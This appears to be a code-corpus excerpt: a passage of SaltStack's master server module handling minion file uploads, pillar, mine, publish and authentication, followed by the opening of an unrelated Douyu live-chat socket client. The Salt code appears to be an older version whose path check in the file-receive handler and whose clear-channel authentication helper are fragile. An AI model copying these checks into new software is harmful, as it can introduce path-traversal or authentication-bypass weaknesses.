self._serve_file = self.fs_.serve_file
self._file_find = self.fs_._find_file
self._file_hash = self.fs_.file_hash
self._file_hash_and_stat = self.fs_.file_hash_and_stat
self._file_list = self.fs_.file_list
self._file_list_emptydirs = self.fs_.file_list_emptydirs
self._dir_list = self.fs_.dir_list
self._symlink_list = self.fs_.symlink_list
self._file_envs = self.fs_.envs
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
if not salt.utils.verify.valid_id(self.opts, id_):
return False
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
try:
pub = salt.crypt.get_rsa_pub_key(pub_path)
except (IOError, OSError):
log.warning(
'Salt minion claiming to be %s attempted to communicate with '
'master, but key could not be read and verification was denied.',
id_
)
return False
except (ValueError, IndexError, TypeError) as err:
log.error('Unable to load public key "%s": %s', pub_path, err)
try:
if salt.crypt.public_decrypt(pub, token) == b'salt':
return True
except ValueError as err:
log.error('Unable to decrypt token: %s', err)
log.error(
'Salt minion claiming to be %s has attempted to communicate with '
'the master and could not be verified', id_
)
return False
def verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
return self.__verify_minion(id_, token)
def __verify_minion_publish(self, clear_load):
'''
Verify that the passed information authorized a minion to execute
:param dict clear_load: A publication load from a minion
:rtype: bool
:return: A boolean indicating if the minion is allowed to publish the command in the load
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return False
if not isinstance(self.opts['peer'], dict):
return False
if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')):
return False
# If the command will make a recursive publish don't run
if clear_load['fun'].startswith('publish.'):
return False
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning(
'Minion id %s is not who it says it is and is attempting '
'to issue a peer command', clear_load['id']
)
return False
clear_load.pop('tok')
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
# finally, check the auth of the load
return self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
publish_validate=True)
def __verify_load(self, load, verify_keys):
'''
A utility function to perform common verification steps.
:param dict load: A payload received from a minion
:param list verify_keys: A list of strings that should be present in a
given load
:rtype: bool
:rtype: dict
:return: The original load (except for the token) if the load can be
verified. False if the load is invalid.
'''
if any(key not in load for key in verify_keys):
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return False
if 'tok' in load:
load.pop('tok')
return load
def _master_tops(self, load):
'''
Return the results from an external node classifier if one is
specified
:param dict load: A payload received from a minion
:return: The results from an external node classifier
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
return self.masterapi._master_tops(load, skip_verify=True)
# Needed so older minions can request master_tops
_ext_nodes = _master_tops
def _master_opts(self, load):
'''
Return the master options to the minion
:param dict load: A payload received from a minion
:rtype: dict
:return: The master options
'''
mopts = {}
file_roots = {}
envs = self._file_envs()
for saltenv in envs:
if saltenv not in file_roots:
file_roots[saltenv] = []
mopts['file_roots'] = file_roots
mopts['top_file_merging_strategy'] = self.opts['top_file_merging_strategy']
mopts['env_order'] = self.opts['env_order']
mopts['default_top'] = self.opts['default_top']
if load.get('env_only'):
return mopts
mopts['renderer'] = self.opts['renderer']
mopts['failhard'] = self.opts['failhard']
mopts['state_top'] = self.opts['state_top']
mopts['state_top_saltenv'] = self.opts['state_top_saltenv']
mopts['nodegroups'] = self.opts['nodegroups']
mopts['state_auto_order'] = self.opts['state_auto_order']
mopts['state_events'] = self.opts['state_events']
mopts['state_aggregate'] = self.opts['state_aggregate']
mopts['jinja_env'] = self.opts['jinja_env']
mopts['jinja_sls_env'] = self.opts['jinja_sls_env']
mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks']
mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks']
return mopts
def _mine_get(self, load):
'''
Gathers the data from the specified minions' mine
:param dict load: A payload received from a minion
:rtype: dict
:return: Mine data from the specified minions
'''
load = self.__verify_load(load, ('id', 'tgt', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_get(load, skip_verify=True)
def _mine(self, load):
'''
Store the mine data
:param dict load: A payload received from a minion
:rtype: bool
:return: True if the data has been stored in the mine
'''
load = self.__verify_load(load, ('id', 'data', 'tok'))
if load is False:
return {}
return self.masterapi._mine(load, skip_verify=True)
def _mine_delete(self, load):
'''
Allow the minion to delete a specific function from its own mine
:param dict load: A payload received from a minion
:rtype: bool
:return: Boolean indicating whether or not the given function was deleted from the mine
'''
load = self.__verify_load(load, ('id', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_delete(load)
def _mine_flush(self, load):
'''
Allow the minion to delete all of its own mine contents
:param dict load: A payload received from a minion
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_flush(load, skip_verify=True)
def _file_recv(self, load):
'''
Allows minions to send files to the master, files are sent to the
master file cache
'''
if any(key not in load for key in ('id', 'path', 'loc')):
return False
if not isinstance(load['path'], list):
return False
if not self.opts['file_recv']:
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
file_recv_max_size = 1024*1024 * self.opts['file_recv_max_size']
if 'loc' in load and load['loc'] < 0:
log.error('Invalid file pointer: load[loc] < 0')
return False
if len(load['data']) + load.get('loc', 0) > file_recv_max_size:
log.error(
'file_recv_max_size limit of %d MB exceeded! %s will be '
'truncated. To successfully push this file, adjust '
'file_recv_max_size to an integer (in MB) large enough to '
'accommodate it.', file_recv_max_size, load['path']
)
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return {}
load.pop('tok')
# Join path
sep_path = os.sep.join(load['path'])
# Path normalization should have been done by the sending
# minion but we can't guarantee it. Re-do it here.
normpath = os.path.normpath(sep_path)
# Ensure that this safety check is done after the path
# have been normalized.
if os.path.isabs(normpath) or '../' in load['path']:
# Can overwrite master files!!
return False
cpath = os.path.join(
self.opts['cachedir'],
'minions',
load['id'],
'files',
normpath)
# One last safety check here
if not os.path.normpath(cpath).startswith(self.opts['cachedir']):
log.warning(
'Attempt to write received file outside of master cache '
'directory! Requested path: %s. Access denied.', cpath
)
return False
cdir = os.path.dirname(cpath)
if not os.path.isdir(cdir):
try:
os.makedirs(cdir)
except os.error:
pass
if os.path.isfile(cpath) and load['loc'] != 0:
mode = 'ab'
else:
mode = 'wb'
with salt.utils.files.fopen(cpath, mode) as fp_:
if load['loc']:
fp_.seek(load['loc'])
fp_.write(salt.utils.stringutils.to_bytes(load['data']))
return True
def _pillar(self, load):
'''
Return the pillar data for the minion
:param dict load: Minion payload
:rtype: dict
:return: The pillar data for the minion
'''
if any(key not in load for key in ('id', 'grains')):
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
load['grains']['id'] = load['id']
pillar = salt.pillar.get_pillar(
self.opts,
load['grains'],
load['id'],
load.get('saltenv', load.get('env')),
ext=load.get('ext'),
pillar_override=load.get('pillar_override', {}),
pillarenv=load.get('pillarenv'),
extra_minion_data=load.get('extra_minion_data'))
data = pillar.compile_pillar()
self.fs_.update_opts()
if self.opts.get('minion_data_cache', False):
self.masterapi.cache.store('minions/{0}'.format(load['id']),
'data',
{'grains': load['grains'],
'pillar': data})
if self.opts.get('minion_data_cache_events') is True:
self.event.fire_event({'Minion data cache refresh': load['id']}, tagify(load['id'], 'refresh', 'minion'))
return data
def _minion_event(self, load):
'''
Receive an event from the minion and fire it on the master event
interface
:param dict load: The minion payload
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
# Route to master event bus
self.masterapi._minion_event(load)
# Process locally
self._handle_minion_event(load)
def _handle_minion_event(self, load):
'''
Act on specific events from minions
'''
id_ = load['id']
if load.get('tag', '') == '_salt_error':
log.error(
'Received minion error from [%s]: %s',
id_, load['data']['message']
)
for event in load.get('events', []):
event_data = event.get('data', {})
if 'minions' in event_data:
jid = event_data.get('jid')
if not jid:
continue
minions = event_data['minions']
try:
salt.utils.job.store_minions(
self.opts,
jid,
minions,
mminion=self.mminion,
syndic_id=id_)
except (KeyError, salt.exceptions.SaltCacheError) as exc:
log.error(
'Could not add minion(s) %s for job %s: %s',
minions, jid, exc
)
def _return(self, load):
'''
Handle the return data sent from the minions.
Takes the return, verifies it and fires it on the master event bus.
Typically, this event is consumed by the Salt CLI waiting on the other
end of the event bus but could be heard by any listener on the bus.
:param dict load: The minion payload
'''
if self.opts['require_minion_sign_messages'] and 'sig' not in load:
log.critical(
'_return: Master is requiring minions to sign their '
'messages, but there is no signature in this payload from '
'%s.', load['id']
)
return False
if 'sig' in load:
log.trace('Verifying signed event publish from minion')
sig = load.pop('sig')
this_minion_pubkey = os.path.join(self.opts['pki_dir'], 'minions/{0}'.format(load['id']))
serialized_load = salt.serializers.msgpack.serialize(load)
if not salt.crypt.verify_signature(this_minion_pubkey, serialized_load, sig):
log.info('Failed to verify event signature from minion %s.', load['id'])
if self.opts['drop_messages_signature_fail']:
log.critical(
'Drop_messages_signature_fail is enabled, dropping '
'message from %s', load['id']
)
return False
else:
log.info('But \'drop_message_signature_fail\' is disabled, so message is still accepted.')
load['sig'] = sig
try:
salt.utils.job.store_job(
self.opts, load, event=self.event, mminion=self.mminion)
except salt.exceptions.SaltCacheError:
log.error('Could not store job information for load: %s', load)
def _syndic_return(self, load):
'''
Receive a syndic minion return and format it to look like returns from
individual minions.
:param dict load: The minion payload
'''
loads = load.get('load')
if not isinstance(loads, list):
loads = [load] # support old syndics not aggregating returns
for load in loads:
# Verify the load
if any(key not in load for key in ('return', 'jid', 'id')):
continue
# if we have a load, save it
if load.get('load'):
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](load['jid'], load['load'])
# Register the syndic
syndic_cache_path = os.path.join(self.opts['cachedir'], 'syndics', load['id'])
if not os.path.exists(syndic_cache_path):
path_name = os.path.split(syndic_cache_path)[0]
if not os.path.exists(path_name):
os.makedirs(path_name)
with salt.utils.files.fopen(syndic_cache_path, 'w') as wfh:
wfh.write('')
# Format individual return loads
for key, item in six.iteritems(load['return']):
ret = {'jid': load['jid'],
'id': key}
ret.update(item)
if 'master_id' in load:
ret['master_id'] = load['master_id']
if 'fun' in load:
ret['fun'] = load['fun']
if 'arg' in load:
ret['fun_args'] = load['arg']
if 'out' in load:
ret['out'] = load['out']
if 'sig' in load:
ret['sig'] = load['sig']
self._return(ret)
def minion_runner(self, clear_load):
'''
Execute a runner from a minion, return the runner's function data
:param dict clear_load: The minion payload
:rtype: dict
:return: The runner function data
'''
load = self.__verify_load(clear_load, ('fun', 'arg', 'id', 'tok'))
if load is False:
return {}
else:
return self.masterapi.minion_runner(clear_load)
def pub_ret(self, load):
'''
Request the return data from a specific jid, only allowed
if the requesting minion also initialted the execution.
:param dict load: The minion payload
:rtype: dict
:return: Return data corresponding to a given JID
'''
load = self.__verify_load(load, ('jid', 'id', 'tok'))
if load is False:
return {}
# Check that this minion can access this data
auth_cache = os.path.join(
self.opts['cachedir'],
'publish_auth')
if not os.path.isdir(auth_cache):
os.makedirs(auth_cache)
jid_fn = os.path.join(auth_cache, six.text_type(load['jid']))
with salt.utils.files.fopen(jid_fn, 'r') as fp_:
if not load['id'] == fp_.read():
return {}
# Grab the latest and return
return self.local.get_cache_returns(load['jid'])
def minion_pub(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
This configuration will enable all minions to execute all commands:
.. code-block:: bash
peer:
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion pay
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_pub(clear_load)
def minion_publish(self, clear_load):
'''
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
.. code-block:: bash
peer:
.*:
- .*
This configuration will enable all minions to execute all commands.
peer:
.. code-block:: bash
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion payload
'''
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_publish(clear_load)
def revoke_auth(self, load):
'''
Allow a minion to request revocation of its own key
:param dict load: The minion payload
:rtype: dict
:return: If the load is invalid, it may be returned. No key operation is performed.
:rtype: bool
:return: True if key was revoked, False if not
'''
load = self.__verify_load(load, ('id', 'tok'))
if not self.opts.get('allow_minion_key_revoke', False):
log.warning(
'Minion %s requested key revoke, but allow_minion_key_revoke '
'is set to False', load['id']
)
return load
if load is False:
return load
else:
return self.masterapi.revoke_auth(load)
def run_func(self, func, load):
'''
Wrapper for running functions executed with AES encryption
:param function func: The function to run
:return: The result of the master function that was called
'''
# Don't honor private functions
if func.startswith('__'):
# TODO: return some error? Seems odd to return {}
return {}, {'fun': 'send'}
# Run the func
if hasattr(self, func):
try:
start = time.time()
ret = getattr(self, func)(load)
log.trace(
'Master function call %s took %s seconds',
func, time.time() - start
)
except Exception:
ret = ''
log.error('Error in function %s:\n', func, exc_info=True)
else:
log.error(
'Received function %s which is unavailable on the master, '
'returning False', func
)
return False, {'fun': 'send'}
# Don't encrypt the return value for the _return func
# (we don't care about the return value, so why encrypt it?)
if func == '_return':
return ret, {'fun': 'send'}
if func == '_pillar' and 'id' in load:
if load.get('ver') != '2' and self.opts['pillar_version'] == 1:
# Authorized to return old pillar proto
return ret, {'fun': 'send'}
return ret, {'fun': 'send_private', 'key': 'pillar', 'tgt': load['id']}
# Encrypt the return
return ret, {'fun': 'send'}
class ClearFuncs(object):
'''
Set up functions that are safe to execute when commands sent to the master
without encryption and authentication
'''
# The ClearFuncs object encapsulates the functions that can be executed in
# the clear:
# publish (The publish from the LocalClient)
# _auth
def __init__(self, opts, key):
self.opts = opts
self.key = key
# Create the event manager
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Make an minion checker object
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make an Auth object
self.loadauth = salt.auth.LoadAuth(opts)
# Stand up the master Minion to access returner data
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
# Make a wheel object
self.wheel_ = salt.wheel.Wheel(opts)
# Make a masterapi object
self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key)
def runner(self, clear_load):
'''
Send a master control function back to the runner system
'''
# All runner ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
runner_check = self.ckminions.runner_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not runner_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(runner_check, dict) and 'error' in runner_check:
# A dictionary with an error name/message was handled by ckminions.runner_check
return runner_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
fun = clear_load.pop('fun')
runner_client = salt.runner.RunnerClient(self.opts)
return runner_client.async(fun,
clear_load.get('kwarg', {}),
username)
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
return {'error': {'name': exc.__class__.__name__,
'args': exc.args,
'message': six.text_type(exc)}}
def wheel(self, clear_load):
'''
Send a master control function back to the wheel system
'''
# All wheel ops pass through eauth
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
wheel_check = self.ckminions.wheel_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not wheel_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(wheel_check, dict) and 'error' in wheel_check:
# A dictionary with an error name/message was handled by ckminions.wheel_check
return wheel_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
jid = salt.utils.jid.gen_jid(self.opts)
fun = clear_load.pop('fun')
tag = tagify(jid, prefix='wheel')
data = {'fun': "wheel.{0}".format(fun),
'jid': jid,
'tag': tag,
'user': username}
self.event.fire_event(data, tagify([jid, 'new'], 'wheel'))
ret = self.wheel_.call_func(fun, full_return=True, **clear_load)
data['return'] = ret['return']
data['success'] = ret['success']
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format(
fun,
exc.__class__.__name__,
exc,
)
data['success'] = False
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
def mk_token(self, clear_load):
'''
Create and return an authentication token, the clear load needs to
contain the eauth key and the needed authentication creds.
'''
token = self.loadauth.mk_token(clear_load)
if not token:
log.warning('Authentication failure of type "eauth" occurred.')
return ''
return token
def get_token(self, clear_load):
'''
Return the name associated with a token or False if the token is invalid
'''
if 'token' not in clear_load:
return False
return self.loadauth.get_tok(clear_load['token'])
def publish(self, clear_load):
'''
This method sends out publications to the minions, it can only be used
by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
publisher_acl = salt.acl.PublisherACL(self.opts['publisher_acl_blacklist'])
if publisher_acl.user_is_blacklisted(clear_load['user']) or \
publisher_acl.cmd_is_blacklisted(clear_load['fun']):
log.error(
'%s does not have permissions to run %s. Please contact '
'your local administrator if you believe this is in '
'error.\n', clear_load['user'], clear_load['fun']
)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Retrieve the minions list
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
_res = self.ckminions.check_minions(
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
delimiter
)
minions = _res.get('minions', list())
missing = _res.get('missing', list())
ssh_minions = _res.get('ssh_minions', False)
# Check for external auth calls and authenticate
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(extra)
if auth_type == 'user':
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
else:
auth_check = self.loadauth.check_authentication(extra, auth_type)
# Setup authorization list variable and error information
auth_list = auth_check.get('auth_list', [])
err_msg = 'Authentication failure of type "{0}" occurred.'.format(auth_type)
if auth_check.get('error'):
# Authentication error occurred: do not continue.
log.warning(err_msg)
return {'error': {'name': 'AuthenticationError',
'message': 'Authentication error occurred.'}}
# All Token, Eauth, and non-root users must pass the authorization check
if auth_type != 'user' or (auth_type == 'user' and auth_list):
# Authorize the request
authorized = self.ckminions.auth_check(
auth_list,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
minions=minions,
# always accept find_job
whitelist=['saltutil.find_job'],
)
if not authorized:
# Authorization error occurred. Do not continue.
log.warning(err_msg)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Perform some specific auth_type tasks after the authorization check
if auth_type == 'token':
username = auth_check.get('username')
clear_load['user'] = username
log.debug('Minion tokenized user = "%s"', username)
elif auth_type == 'eauth':
# The username we are attempting to auth with
clear_load['user'] = self.loadauth.load_name(extra)
# If we order masters (via a syndic), don't short circuit if no minions
# are found
if not self.opts.get('order_masters'):
# Check for no minions
if not minions:
return {
'enc': 'clear',
'load': {
'jid': None,
'minions': minions,
'error': 'Master could not resolve minions for target {0}'.format(clear_load['tgt'])
}
}
jid = self._prep_jid(clear_load, extra)
if jid is None:
return {'enc': 'clear',
'load': {'error': 'Master failed to assign jid'}}
payload = self._prep_pub(minions, jid, clear_load, extra, missing)
# Send it!
self._send_ssh_pub(payload, ssh_minions=ssh_minions)
self._send_pub(payload)
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions,
'missing': missing
}
}
def _prep_auth_info(self, clear_load):
sensitive_load_keys = []
key = None
if 'token' in clear_load:
auth_type = 'token'
err_name = 'TokenAuthenticationError'
sensitive_load_keys = ['token']
elif 'eauth' in clear_load:
auth_type = 'eauth'
err_name = 'EauthAuthenticationError'
sensitive_load_keys = ['username', 'password']
else:
auth_type = 'user'
err_name = 'UserAuthenticationError'
key = self.key
return auth_type, err_name, key, sensitive_load_keys
def _prep_jid(self, clear_load, extra):
'''
Return a jid for this publication
'''
# the jid in clear_load can be None, '', or something else. this is an
# attempt to clean up the value before passing to plugins
passed_jid = clear_load['jid'] if clear_load.get('jid') else None
nocache = extra.get('nocache', False)
# Retrieve the jid
fstr = '{0}.prep_jid'.format(self.opts['master_job_cache'])
try:
# Retrieve the jid
jid = self.mminion.returners[fstr](nocache=nocache,
passed_jid=passed_jid)
except (KeyError, TypeError):
# The returner is not present
msg = (
'Failed to allocate a jid. The requested returner \'{0}\' '
'could not be loaded.'.format(fstr.split('.')[0])
)
log.error(msg)
return {'error': msg}
return jid
def _send_pub(self, load):
'''
Take a load and send it across the network to connected minions
'''
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.publish(load)
@property
def ssh_client(self):
if not hasattr(self, '_ssh_client'):
self._ssh_client = salt.client.ssh.client.SSHClient(mopts=self.opts)
return self._ssh_client
def _send_ssh_pub(self, load, ssh_minions=False):
'''
Take a load and send it across the network to ssh minions
'''
if self.opts['enable_ssh_minions'] is True and ssh_minions is True:
log.debug('Send payload to ssh minions')
threading.Thread(target=self.ssh_client.cmd, kwargs=load).start()
def _prep_pub(self, minions, jid, clear_load, extra, missing):
'''
Take a given load and perform the necessary steps
to prepare a publication.
TODO: This is really only bound by temporal cohesion
and thus should be refactored even further.
'''
clear_load['jid'] = jid
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
# TODO Error reporting over the master event bus
self.event.fire_event({'minions': minions}, clear_load['jid'])
new_job_load = {
'jid': clear_load['jid'],
'tgt_type': clear_load['tgt_type'],
'tgt': clear_load['tgt'],
'user': clear_load['user'],
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'minions': minions,
'missing': missing,
}
# Announce the job on the event bus
self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job'))
if self.opts['ext_job_cache']:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
save_load_func = True
# Get the returner's save_load arg_spec.
try:
arg_spec = salt.utils.args.get_function_argspec(self.mminion.returners[fstr])
# Check if 'minions' is included in returner's save_load arg_spec.
# This may be missing in custom returners, which we should warn about.
if 'minions' not in arg_spec.args:
log.critical(
'The specified returner used for the external job cache '
'\'%s\' does not have a \'minions\' kwarg in the returner\'s '
'save_load function.', self.opts['ext_job_cache']
)
except (AttributeError, KeyError):
save_load_func = False
log.critical(
'The specified returner used for the external job cache '
'"%s" does not have a save_load function!',
self.opts['ext_job_cache']
)
if save_load_func:
try:
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions=minions)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# always write out to the master job caches
try:
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions)
except KeyError:
log.critical(
'The specified returner used for the master job cache '
'"%s" does not have a save_load function!',
self.opts['master_job_cache']
)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
}
# if you specified a master id, lets put that in the load
if 'master_id' in self.opts:
load['master_id'] = self.opts['master_id']
# if someone passed us one, use that
if 'master_id' in extra:
load['master_id'] = extra['master_id']
# Only add the delimiter to the pub data if it is non-default
if delimiter != DEFAULT_TARGET_DELIM:
load['delimiter'] = delimiter
if 'id' in extra:
load['id'] = extra['id']
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'kwargs' in clear_load:
if 'ret_config' in clear_load['kwargs']:
load['ret_config'] = clear_load['kwargs'].get('ret_config')
if 'metadata' in clear_load['kwargs']:
load['metadata'] = clear_load['kwargs'].get('metadata')
if 'module_executors' in clear_load['kwargs']:
load['module_executors'] = clear_load['kwargs'].get('module_executors')
if 'executor_opts' in clear_load['kwargs']:
load['executor_opts'] = clear_load['kwargs'].get('executor_opts')
if 'ret_kwargs' in clear_load['kwargs']:
load['ret_kwargs'] = clear_load['kwargs'].get('ret_kwargs')
if 'user' in clear_load:
log.info(
'User %s Published command %s with jid %s',
clear_load['user'], clear_load['fun'], clear_load['jid']
)
load['user'] = clear_load['user']
else:
log.info(
'Published command %s with jid %s',
clear_load['fun'], clear_load['jid']
)
log.debug('Published command details %s', load)
return load
def ping(self, clear_load):
'''
Send the load back to the sender.
'''
return clear_load
class FloMWorker(MWorker):
'''
Change the run and bind to be ioflo friendly
'''
def __init__(self,
opts,
key,
):
MWorker.__init__(self, opts, key)
def setup(self):
'''
Prepare the needed objects and socket for iteration within ioflo
'''
salt.utils.crypt.appendproctitle(self.__class__.__name__)
self.clear_funcs = salt.master.ClearFuncs(
self.opts,
self.key,
)
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.context = zmq.Context(1)
self.socket = self.context.socket(zmq.REP)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('ZMQ Worker binding to socket %s', self.w_uri)
self.poller = zmq.Poller()
self.poller.register(self.socket, zmq.POLLIN)
self.socket.connect(self.w_uri)
def handle_request(self):
'''
Handle a single request
'''
try:
polled = self.poller.poll(1)
if polled:
package = self.socket.recv()
self._update_aes()
payload = self.serial.loads(package)
ret = self.serial.dumps(self._handle_payload(payload))
self.socket.send(ret)
except KeyboardInterrupt:
raise
except Exception as exc:
# Properly handle EINTR from SIGUSR1
if isinstance(exc, zmq.ZMQError) and exc.errno == errno.EINTR:
return
|
danmu_factory.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017/12/7
# @Author : wangmengcn
# @Email : eclipse_sv@163.com
import socket
import re
from time import time, sleep
from datetime import datetime
from threading import Thread
from json import dumps
from . import r
class DouyuDM:
HOST = 'openbarrage.douyutv.com'
PORT = 8601
def __init__(self, room_id):
self.room_id = room_id
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.is_connected = False
self.is_terminated = False
# 登陆和保活消息
self.LOGIN_INFO = "type@=loginreq/username@=ABABA/password@=12345678/roomid@={}/".format(room_id)
self.JION_GROUP = "type@=joingroup/rid@={}/gid@=-9999/".format(room_id)
self.KEEP_ALIVE = "type@=keeplive/tick@={}/"
# 消息体解析
self.msg_types = ['@=chatmsg', '@=onlinegift', '@=dgb',
'@=uenter', '@=bc_buy_deserve', '@=ssd',
'@=spbc', '@=ggbb']
self.convert_function_map = {
'@=chatmsg': self._convert_chatmsg,
'@=onlinegift': self._convert_onlinegift,
'@=dgb': self._convert_dgb,
'@=uenter': self._convert_uenter,
'@=bc_buy_deserve': self._convert_bc_buy_deserve,
'@=ssd': self._convert_ssd,
'@=spbc': self._convert_spbc,
